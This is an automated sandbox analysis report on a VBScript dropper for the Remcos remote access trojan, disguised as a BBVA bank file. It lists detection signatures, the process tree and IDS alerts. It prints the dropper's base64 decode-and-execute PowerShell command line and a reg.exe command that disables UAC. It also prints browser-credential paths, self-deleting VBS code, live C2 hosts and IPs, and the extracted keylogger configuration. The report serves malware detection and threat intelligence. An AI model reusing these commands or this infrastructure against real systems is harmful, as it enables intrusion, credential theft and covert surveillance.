
Windows Analysis Report
BBVA S.A..vbs

Overview

General Information

Sample name: BBVA S.A..vbs
Analysis ID: 1576754
MD5: 3c217b6a70e1ff5e6ecb71ca0e89644a
SHA1: d158bcee429368797c22f4c2f9a305c2ff37beae
SHA256: 4e66fdbc38893f545b9088331861312e46e612bc9f4f96a9c88b286588680bf9
Tags: vbs, user-lowmal3

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Command shell drops VBS files
Connects to a pastebin service (likely for C&C)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Installs a global keyboard hook
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: AspNetCompiler Execution
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 3556 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BBVA S.A..vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 3704 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = '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';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7708 cmdline: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\haematachometer.vbs" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • aspnet_compiler.exe (PID: 7924 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
        • wscript.exe (PID: 4996 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\paqxrhksjzifkagvqwpv.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
  • wscript.exe (PID: 7864 cmdline: wscript.exe C:\ProgramData\haematachometer.vbs MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7972 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = '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';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • aspnet_compiler.exe (PID: 2184 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
      • aspnet_compiler.exe (PID: 4544 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["rem.pushswroller.eu:23101:1", "firewarzone.ydns.eu:23101:1", "sun.drillmmcsnk.eu:23101:1"], "Assigned name": "NW", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmcghghyrtssxr-7RL1P2", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source: C:\ProgramData\remcos\logs.dat | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_Keylogger_Generic | Description: Yara detected Keylogger Generic | Author: Joe Security
Source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
Source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown | Strings:
  • 0x6b6f8:$a1: Remcos restarted by watchdog!
  • 0x6bc70:$a3: %02i:%02i:%02i:%03i
Source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Rule: REMCOS_RAT_variants | Description: unknown | Author: unknown | Strings:
  • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
  • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x65a04:$str_b2: Executing file:
  • 0x6683c:$str_b3: GetDirectListeningPort
  • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x66380:$str_b7: \update.vbs
  • 0x65a2c:$str_b9: Downloaded file:
  • 0x65a18:$str_b10: Downloading file:
  • 0x65abc:$str_b12: Failed to upload file:
  • 0x66804:$str_b13: StartForward
  • 0x66824:$str_b14: StopForward
  • 0x662d8:$str_b15: fso.DeleteFile "
  • 0x6626c:$str_b16: On Error Resume Next
  • 0x66308:$str_b17: fso.DeleteFolder "
  • 0x65aac:$str_b18: Uploaded file:
  • 0x65a6c:$str_b19: Unable to delete:
  • 0x662a0:$str_b20: while fso.FileExists("
  • 0x65f49:$str_c0: [Firefox StoredLogins not found]
Source: 21.2.aspnet_compiler.exe.400000.0.raw.unpack | Rule: JoeSecurity_Keylogger_Generic | Description: Yara detected Keylogger Generic | Author: Joe Security
Source: 21.2.aspnet_compiler.exe.400000.0.raw.unpack | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 21.2.aspnet_compiler.exe.400000.0.raw.unpack | Rule: JoeSecurity_UACBypassusingCMSTP | Description: Yara detected UAC Bypass using CMSTP | Author: Joe Security
Source: 21.2.aspnet_compiler.exe.400000.0.raw.unpack | Rule: Windows_Trojan_Remcos_b296e965 | Description: unknown | Author: unknown | Strings:
  • 0x6b6f8:$a1: Remcos restarted by watchdog!
  • 0x6bc70:$a3: %02i:%02i:%02i:%03i
Source: 21.2.aspnet_compiler.exe.400000.0.raw.unpack | Rule: REMCOS_RAT_variants | Description: unknown | Author: unknown | Strings:
  • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
  • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x65a04:$str_b2: Executing file:
  • 0x6683c:$str_b3: GetDirectListeningPort
  • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x66380:$str_b7: \update.vbs
  • 0x65a2c:$str_b9: Downloaded file:
  • 0x65a18:$str_b10: Downloading file:
  • 0x65abc:$str_b12: Failed to upload file:
  • 0x66804:$str_b13: StartForward
  • 0x66824:$str_b14: StopForward
  • 0x662d8:$str_b15: fso.DeleteFile "
  • 0x6626c:$str_b16: On Error Resume Next
  • 0x66308:$str_b17: fso.DeleteFolder "
  • 0x65aac:$str_b18: Uploaded file:
  • 0x65a6c:$str_b19: Unable to delete:
  • 0x662a0:$str_b20: while fso.FileExists("
  • 0x65f49:$str_c0: [Firefox StoredLogins not found]
Source: amsi64_3704.amsi.csv | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
Source: amsi64_3704.amsi.csv | Rule: JoeSecurity_PowershellDecodeAndExecute | Description: Yara detected Powershell decode and execute | Author: Joe Security
Source: amsi64_7972.amsi.csv | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
Source: amsi64_7972.amsi.csv | Rule: JoeSecurity_PowershellDecodeAndExecute | Description: Yara detected Powershell decode and execute | Author: Joe Security

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = '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';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRl
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = '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';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRl
Source: Network Connection | Author: frack113, Florian Roth | Data: DestinationIp: 45.63.94.214, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 3556, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49713
Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\paqxrhksjzifkagvqwpv.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\paqxrhksjzifkagvqwpv.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentProcessId: 7924, ParentProcessName: aspnet_compiler.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\paqxrhksjzifkagvqwpv.vbs" , ProcessId: 4996, ProcessName: wscript.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\paqxrhksjzifkagvqwpv.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\paqxrhksjzifkagvqwpv.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentProcessId: 7924, ParentProcessName: aspnet_compiler.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\paqxrhksjzifkagvqwpv.vbs" , ProcessId: 4996, ProcessName: wscript.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BBVA S.A..vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BBVA S.A..vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BBVA S.A..vbs", ProcessId: 3556, ProcessName: wscript.exe
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = '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';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically, ParentImage: C:\Windows\
Source: Network Connection | Author: frack113 | Data: DestinationIp: 45.63.94.214, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 3556, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49713
Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\haematachometer.vbs", CommandLine: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\haematachometer.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = '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';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3704, ParentProcessNam
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BBVA S.A..vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BBVA S.A..vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BBVA S.A..vbs", ProcessId: 3556, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = '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';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRl

Stealing of Sensitive Information

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 7924, TargetFilename: C:\ProgramData\remcos\logs.dat

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-17T14:30:38.013728+0100 | 2020425 | 1 | Exploit Kit Activity Detected | 104.21.84.67 | 443 | 192.168.2.6 | 49784 | TCP
2024-12-17T14:31:15.461826+0100 | 2020425 | 1 | Exploit Kit Activity Detected | 104.21.84.67 | 443 | 192.168.2.6 | 49880 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-17T14:30:38.013728+0100 | 2020424 | 1 | Exploit Kit Activity Detected | 104.21.84.67 | 443 | 192.168.2.6 | 49784 | TCP
2024-12-17T14:31:15.461826+0100 | 2020424 | 1 | Exploit Kit Activity Detected | 104.21.84.67 | 443 | 192.168.2.6 | 49880 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-17T14:30:40.870317+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49795 | 45.80.158.30 | 23101 | TCP
2024-12-17T14:30:54.120307+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49829 | 45.80.158.30 | 23101 | TCP
2024-12-17T14:30:54.261015+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49830 | 45.80.158.30 | 23101 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-17T14:30:43.373018+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.6 | 49803 | 178.237.33.50 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-17T14:30:39.010116+0100 | 2858295 | 1 | A Network Trojan was detected | 104.21.84.67 | 443 | 192.168.2.6 | 49784 | TCP
2024-12-17T14:31:16.431606+0100 | 2858295 | 1 | A Network Trojan was detected | 104.21.84.67 | 443 | 192.168.2.6 | 49880 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-17T14:30:37.607592+0100 | 2841075 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49784 | 104.21.84.67 | 443 | TCP
2024-12-17T14:31:15.065246+0100 | 2841075 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49880 | 104.21.84.67 | 443 | TCP

AV Detection

Source: firewarzone.ydns.eu | Avira URL Cloud: Label: malware
Source: sun.drillmmcsnk.eu | Avira URL Cloud: Label: malware
Source: rem.pushswroller.eu | Avira URL Cloud: Label: malware
Source: 0000000F.00000002.2892055901.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["rem.pushswroller.eu:23101:1", "firewarzone.ydns.eu:23101:1", "sun.drillmmcsnk.eu:23101:1"], "Assigned name": "NW", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmcghghyrtssxr-7RL1P2", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source: Yara match | File source: 21.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2892055901.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.2896720400.0000000002C1F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.2876508990.0000000001248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: aspnet_compiler.exe PID: 7924, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: aspnet_compiler.exe PID: 4544, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 21_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,21_2_0043293A
Source: aspnet_compiler.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Source: Yara match | File source: 21.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: aspnet_compiler.exe PID: 4544, type: MEMORYSTR

Privilege Escalation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 21_2_00406764 _wcslen,CoGetObject,21_2_00406764
Source: unknown | HTTPS traffic detected: 45.63.94.214:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.6:49784 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 45.63.94.214:443 -> 192.168.2.6:49790 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.6:49880 version: TLS 1.2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 21_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,21_2_0040B335
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 21_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,21_2_0041B42F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 21_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,21_2_0040B53A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 21_2_0044D5E9 FindFirstFileExA,21_2_0044D5E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 21_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,21_2_004089A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 21_2_00406AC2 FindFirstFileW,FindNextFileW,21_2_00406AC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 21_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,21_2_00407A8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 21_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,21_2_00418C69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 21_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,21_2_00408DA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 21_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,21_2_00406F06

